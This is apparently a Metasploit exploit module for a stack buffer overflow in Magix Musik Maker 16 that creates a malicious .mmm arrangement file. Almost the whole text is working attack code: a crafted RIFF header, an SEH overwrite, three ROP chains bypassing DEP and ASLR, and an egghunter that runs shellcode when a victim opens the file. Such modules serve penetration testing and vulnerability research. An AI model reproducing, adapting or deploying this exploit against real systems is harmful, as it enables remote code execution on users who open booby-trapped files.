## # $Id: magix_musikmaker_16_mmm.rb 12688 2011-05-22 23:41:15Z swtornio $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Magix Musik Maker 16 .mmm Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Magix Musik Maker 16. When opening a specially crafted arrangement file (.mmm) in the application, an unsafe strcpy() will allow you to overwrite a SEH handler. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and might require up to several seconds to receive a shell. }, 'License' => MSF_LICENSE, 'Author' => [ 'acidgen', #found the vulnerability 'corelanc0d3r' #rop exploit + msf module ], 'Version' => '$Revision: 12688 $', 'References' => [ [ 'OSVDB', '72455'], [ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-002' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 8000, #could be more, but this is enough 'DisableNops' => 'True', 'BadChars' => "\x00\x0a\x0d", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows Universal DEP & ASLR Bypass', { 'OffSet' => 198, 'Ret' => 0x200146fa, #add esp,40c/ret [ltkrn14n.dll] } ], ], 'Privileged' => false, 'DisclosureDate' => 'Apr 26 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'mmm file', 'msf.mmm']), ], self.class) end def junk return rand_text(4).unpack("L")[0].to_i end def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") badchars = "" eggoptions = { :checksum => false, :eggtag => "Wo0t", :depmethod => "copy", :depreg => "edi", :depdest => "ebp" } hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions) header = "RIFF" header << "\x8c" header << "A" header << "\x07\x00" header << "SEKDSVIP" header << "\x10\x07\x00\x00\x9b" header << "[n" header << "\x00" * 5 header << "\x11" header << "\x00" * 3 header << "\x08" header << "\x00" * 3 header << "D" header << "\xac\x00\x00\x11" header << "\x00" * 9 header << "9@" header << "\x00\x00\xf0" header << "B" header << "\x00" * 4 header << "\xbd\x04\xef\xfe\x00\x00\x01" header << "\x00" * 3 header << "\x10\x00\x04\x00\x02" header << "\x00" * 3 header << "\x10\x00\x04\x00\x02\x00" header << "?" header << "\x00" * 3 header << "(" header << "\x00" * 3 header << "\x04\x00\x04\x00\x01" header << "\x00" * 15 header << "K" header << "\x91" header << "2" header << "\x01\xd0\x02\x00\x00" header << "@" header << "\x02\x00\x00" header << "UUUUUU" header << "\xf5" header << "?" header << "\x10" header << "\x00" * 7 header << "\xff" * 8 header << "\x00" * 1680 header << "LISTx" header << "\x95\x02\x00" header << "physfile" header << "\xf8\x08\x00\x00" header << "C:\\Documents and Settings\\" header << rand_text(8) header << "\\My Documents\\MAGIX_Music_Maker_16\\AudioTemp" header << "\x00" * 52 header << "Fat Rocker I_ogg.HDP" header << "\x00" * 110 header << "C:\\Documents and Settings\\All Users\\Application Data\\MAGIX\\Music_Maker_16\\_Demos\\Demo" header << "\x00" * 175 header << "Fat Rocker I.OGG" header << "\x00" * 678 header << "\xf0\xbf" header << "\x00" * 22 header << "\xf0" header << "?" header << "\x00" * 6 header << "^@" header << "\x00" * 6 header << "^@" header << "\x00" * 264 filename = "C:\\temp\\" filename << "\xb3\x10\xf8\x1f" * 14 # slide filename << "\x1e\x92\x01\x20" # align rop_chain1 = [ #API pointer 0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll] 0x1ff810b3, # rop nop 0x1ff810b3, # rop nop 0x1ff810b3, # rop nop 0x20047f30, # POP ECX # RETN ** [LTKRN14N.dll] 0x2005012c, # &API ptr 0x200263e4, # MOV EAX,DWORD PTR DS:[ECX] # RETN ** [LTKRN14N.dll] 0x1ffa3ab3, # MOV DWORD PTR DS:[EBX],EAX # MOV EAX,1 # POP EBX # RETN 0C ** [LTDIS14n.dll] junk, 0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll] junk, junk, junk, 0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll] junk, junk, 0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll] 0x1ffa82ef, # POP EAX # RETN junk, junk, 0x2E9FA63D, 0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3 0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll] junk, 0x20047f30, # POP ECX # RETN ** [LTKRN14N.dll] 0x2001283a, # POP ESI # POP EBP # POP EBX # ADD ESP,1F4 # RETN 10 ** [LTKRN14N.dll] # write 0x1ff9cf5a, # MOV DWORD PTR DS:[EAX],ECX # MOV EAX,1 # POP ESI # RETN 08 ** [LTDIS14n.dll] junk, 0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll] junk, junk, 0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll] junk, junk, 0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll] 0x1ffa82ef, # POP EAX # RETN junk, junk, 0x2E9FA5F9, 0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] 0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll] junk, 0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll] junk, junk, 0x1ffa82ef, # POP EAX # RETN ** [LTDIS14n.dll] junk, ].pack("V*") rop_chain2 = [ 0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] 0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll] 0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll] 0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll] junk, junk, 0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll] 0x1ffa82ef, # POP EAX # RETN junk, junk, 0x2E9FA591, 0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3 0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll] junk, 0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # junk, junk, 0x1ffa82ef, # POP EAX # RETN ** [LTDIS14n.dll] junk, junk, junk, junk, 0x2E9FB65D, 0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] 0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll] 0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll] 0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll] junk, junk, 0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll] 0x1ffa82ef, # POP EAX # RETN junk, junk, 0x2E9FA539, 0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN **D16059A3 [LTKRN14N.dll] 0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll] junk, 0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 junk, junk, 0x2004e494, # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll] junk, junk, junk, junk, junk, 0x2004e494, # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll] junk, 0x1ffa0231, # DEC EAX # RETN ** [LTDIS14n.dll] 0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll] 0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll] 0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll] junk, junk, 0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll] 0x1ffa82ef, # POP EAX # RETN junk, junk, 0x2E9FA4D9, 0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN D16059A3 0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll] junk, 0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll] junk, junk, 0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll] junk, junk, junk, junk, 0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll] junk, junk, 0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll] 0x1ffa82ef, # POP EAX # RETN junk, junk, 0x2E9FA469, 0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] 0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll] junk, 0x1ff72ce1, # XCHG EAX,ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV EAX,1 # RETN junk, ].pack("V*") rop_chain3 = [ 0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 junk, junk, junk, junk, 0x1ffa82ef, # POP EAX # RETN junk, junk, 0x2004FF98, 0x1ffaccf6, # ADD EAX,100 # POP EBP # RETN junk, 0x20026406, # MOV EAX,DWORD PTR DS:[EAX] # NEG EAX # RETN ** [LTKRN14N.dll] 0x20026408, # NEG EAX # RETN ** [LTKRN14N.dll] 0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll] 0x2004da79, # XOR EAX,EAX # RETN ** [LTKRN14N.dll] 0x1ff93ae1, # ADD EAX,ESI # POP ESI # RETN junk, 0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll] 0x1fffeb75, # XCHG EAX,EBP # RETN ** [LTKRN14N.dll] junk, junk, #Oh Irony ! 0x6001ac84, # PUSHAD # RETN ** [ijl10.dll] ].pack("V*") rop_chain1_filler = rand_text(target['OffSet'] - rop_chain1.length - 2 ) # find a close heap prehunter = "\x33\xC0" #xor eax,eax prehunter << "\x64\x8B\x40\x30" #mov eax,fs[:30] prehunter << "\x83\xC0\x48" #add eax,48 prehunter << "\x83\xC0\x48" #add eax,48 prehunter << "\x8B\x10" #mov edx,[eax] prehunter << "\x83\xc2\x4c" #add edx,4c prehunter << "\x83\xc2\x4c" #add edx,4c prehunter << "\x8B\x12" #mov edx,[edx] nops = make_nops(100) filler = "\x5D\xC6\x9F\x2E" # offset to 0x2000 filler << "\xc2\x53\x02\x20" # RETN filler << "\x04\x80\xfa\x1f" # jump - first run : 0x1ffa8004 : {pivot 8} # POP EDI # POP EBP # RETN ** [LTDIS14n.dll] filler << "\x12\x3a\xff\x1f" # p/p/p/p/add esp,90/ret [ltkrn14n.dll] - second run filler << "\xff\xff\xff\xff" # access violation buffer = header buffer << filename buffer << rop_chain1 buffer << rop_chain1_filler buffer << [target.ret].pack("V") buffer << filler buffer << rop_chain2 buffer << rop_chain3 buffer << prehunter buffer << hunter buffer << nops buffer << egg filecontent = header + buffer print_status("Writing payload to file") file_create(filecontent) end end